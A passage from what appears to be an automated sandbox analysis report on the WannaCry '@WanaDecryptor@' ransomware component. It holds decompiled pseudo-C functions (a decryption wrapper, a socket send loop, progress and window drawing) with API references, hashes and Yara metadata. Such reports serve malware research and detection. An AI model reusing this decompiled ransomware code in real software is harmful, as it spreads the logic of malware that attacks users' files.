											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}

APIs

EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: CriticalSection$CryptDecryptEnterLeave
String ID:
API String ID: 1395129968-0
Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671

Uniqueness

Uniqueness Score: -1.00%

Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

APIs

#540.MFC42 ref: 00409137
#3874.MFC42(?), ref: 0040914A
#860.MFC42(004213A4,?), ref: 00409177
#860.MFC42(%d%%,?), ref: 00409197
_ftol.MSVCRT ref: 004091BF
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004091DD
#2860.MFC42(00000000), ref: 004091E4
#5875.MFC42(00000001), ref: 0040928D
#6170.MFC42(0000000E,00000001), ref: 004092C0
GetWindowOrgEx.GDI32(?,?,0000000E,00000001), ref: 004092E1
#540.MFC42 ref: 004092FB
#2818.MFC42(?,00000000,?), ref: 00409317
GetObjectA.GDI32(?,0000003C,?), ref: 00409337
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040937B
GetViewportOrgEx.GDI32(?,?), ref: 004093FF
#800.MFC42 ref: 0040963C
#6170.MFC42(?), ref: 0040965D
#5875.MFC42(?), ref: 00409680
#2414.MFC42 ref: 004096D4
#2414.MFC42 ref: 004096F5
#800.MFC42 ref: 00409719

Strings

|gA, xrefs: 004096A6
tgA, xrefs: 00409662
xgA, xrefs: 0040924E
xgA, xrefs: 00409685
pgA, xrefs: 00409641
|gA, xrefs: 00409225
[A, xrefs: 004096FA
%d%%, xrefs: 0040918E
tgA, xrefs: 00409282
gfff, xrefs: 00409344
pgA, xrefs: 004092B8

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
API String ID: 2923375784-3599407550
Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
